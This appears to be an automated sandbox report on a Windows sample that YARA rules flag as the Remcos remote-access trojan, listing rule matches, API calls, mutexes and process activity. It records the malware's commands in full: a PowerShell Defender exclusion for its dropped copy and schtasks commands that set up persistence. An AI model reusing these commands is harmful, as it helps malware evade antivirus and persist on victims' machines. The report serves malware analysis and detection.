            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.4458e78.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.439f658.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3807944178.000000000119A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1402490811.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7288, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xjXWSRbLn.exe PID: 7960, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041A76C SystemParametersInfoW,13_2_0041A76C

            System Summary

            barindex
            Source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Nfi2yQDBda.exe.439f658.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Nfi2yQDBda.exe.439f658.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: Nfi2yQDBda.exe PID: 7288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: xjXWSRbLn.exe PID: 7960, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_00414DB4
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0171D5840_2_0171D584
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0747B7C80_2_0747B7C8
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0747B7B80_2_0747B7B8
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0747D4A80_2_0747D4A8
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0747B3800_2_0747B380
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0747B3900_2_0747B390
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0747AF580_2_0747AF58
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0747CBC00_2_0747CBC0
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeCode function: 0_2_0747CBD00_2_0747CBD0
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_02D2D5848_2_02D2D584
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_074AB7C88_2_074AB7C8
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_074AB7B88_2_074AB7B8
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_074AD4A88_2_074AD4A8
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_074AB3808_2_074AB380
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_074AB3908_2_074AB390
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_074AAF588_2_074AAF58
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_074ACBCA8_2_074ACBCA
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 8_2_074ACBD08_2_074ACBD0
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0042515213_2_00425152
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0043528613_2_00435286
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004513D413_2_004513D4
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0045050B13_2_0045050B
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0043651013_2_00436510
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004316FB13_2_004316FB
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0043569E13_2_0043569E
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0044370013_2_00443700
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004257FB13_2_004257FB
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004128E313_2_004128E3
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0042596413_2_00425964
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041B91713_2_0041B917
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0043D9CC13_2_0043D9CC
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00435AD313_2_00435AD3
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00424BC313_2_00424BC3
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0043DBFB13_2_0043DBFB
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0044ABA913_2_0044ABA9
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00433C0B13_2_00433C0B
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00434D8A13_2_00434D8A
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0043DE2A13_2_0043DE2A
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041CEAF13_2_0041CEAF
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00435F0813_2_00435F08
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: String function: 00402073 appears 51 times
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: String function: 00432B90 appears 53 times
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: String function: 00432525 appears 41 times
            Source: Nfi2yQDBda.exe, 00000000.00000002.1369186671.0000000005B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Nfi2yQDBda.exe
            Source: Nfi2yQDBda.exe, 00000000.00000002.1362733971.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Nfi2yQDBda.exe
            Source: Nfi2yQDBda.exe, 00000000.00000000.1335705920.0000000000D82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDLrIR.exe< vs Nfi2yQDBda.exe
            Source: Nfi2yQDBda.exe, 00000000.00000002.1364332294.000000000331D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Nfi2yQDBda.exe
            Source: Nfi2yQDBda.exe, 00000000.00000002.1371143931.0000000007480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Nfi2yQDBda.exe
            Source: Nfi2yQDBda.exe, 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Nfi2yQDBda.exe
            Source: Nfi2yQDBda.exe, 00000000.00000002.1379582759.0000000007998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs Nfi2yQDBda.exe
            Source: Nfi2yQDBda.exeBinary or memory string: OriginalFilenameDLrIR.exe< vs Nfi2yQDBda.exe
            Source: Nfi2yQDBda.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Nfi2yQDBda.exe.4458e78.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Nfi2yQDBda.exe.439f658.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Nfi2yQDBda.exe.439f658.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: Nfi2yQDBda.exe PID: 7288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: xjXWSRbLn.exe PID: 7960, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Nfi2yQDBda.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: xjXWSRbLn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@18/11@2/1
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_00415C90
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,13_2_0040E2E7
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,13_2_00419493
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00418A00
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeFile created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeMutant created: \Sessions\1\BaseNamedObjects\46875-RPQWNM
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB4A4.tmpJump to behavior
            Source: Nfi2yQDBda.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Nfi2yQDBda.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Nfi2yQDBda.exeVirustotal: Detection: 81%
            Source: Nfi2yQDBda.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeFile read: C:\Users\user\Desktop\Nfi2yQDBda.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Nfi2yQDBda.exe "C:\Users\user\Desktop\Nfi2yQDBda.exe"
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Users\user\Desktop\Nfi2yQDBda.exe "C:\Users\user\Desktop\Nfi2yQDBda.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpC463.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"Jump to behavior
